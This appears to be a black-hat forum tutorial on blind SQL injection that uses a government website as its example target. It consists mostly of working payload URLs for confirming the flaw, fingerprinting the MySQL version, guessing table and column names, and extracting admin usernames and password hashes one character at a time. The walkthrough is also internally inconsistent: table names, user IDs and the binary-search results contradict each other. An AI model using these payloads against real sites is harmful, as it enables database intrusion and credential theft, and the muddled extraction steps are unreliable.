blind sql injection "detailed tutorial"

blind sql injection

if you dont know about mysql injection turn around and learn it b4 u even consider learning this
because this is a whole different story.

1. test for vulnerability
so you have a site lets say :

Code:
www.cia.gov/news.php?id=1
just like normal mysql injection

but for blind you put
Code:
www.cia.gov/news.php?id=1 and 1=2
if you see any text from the page missing
or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that
then its vuln

this works
because 1=2 is always false
you see if it was
Code:
www.cia.gov/index.php?id=1 and 1=1
then you would get the normal page
because 1=1 is always true

2. mysql version
to find mysql version you need to do this query
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4
if the pages comes back true then the version is 4
if not then try
Code:
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=5
if it comes back true then its a version 5

3. fuzzing tables and columns
to find the table name you need to guess it
so...
here is the query
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
i have guessed the table admin if the page loads true then the table exists
eg. the table name is administrator
and we try
Code:
(SELECT 1 from users limit 0,1)=1
then it will return with an error a.k.a. false
but if we did
Code:
(SELECT 1 from administrator limit 0,1)=1
then it would not error a.k.a. true

now for the column
so the table is administrator
and we found that by fuzzing
now we need the column name
we fuzz it by
Code:
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
if the column password exists then it wont error
you get my drift...

4. extracting password with ascii
so now we have the table/column we need to extract
well as you know it wont just pop up on the screen
we will need to use the ancii char
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
if this returns true then you need to go higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
if this errors then its not greater than 103 and greater than/or 99
now try
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
no error then its greater than 99 and not greater than 103
higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101
error
so its greater than 99 but not greater than 101
higher
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
error
so its greater than 99 but not greater than 100 making it 100
the first character of the password is 100 which if u put into an ascii converter you will see
that it is the letter d
now you need to find the next character
Code:
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60
notice how i did where userid=1),2,1))>60 instead of 1,1
so this will be doing the second character
so keep extracting characters untill u get an error
then u will have the hash / password

Sketch- out
Black Hat
a good ascii coneverter can be found at
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

Categories: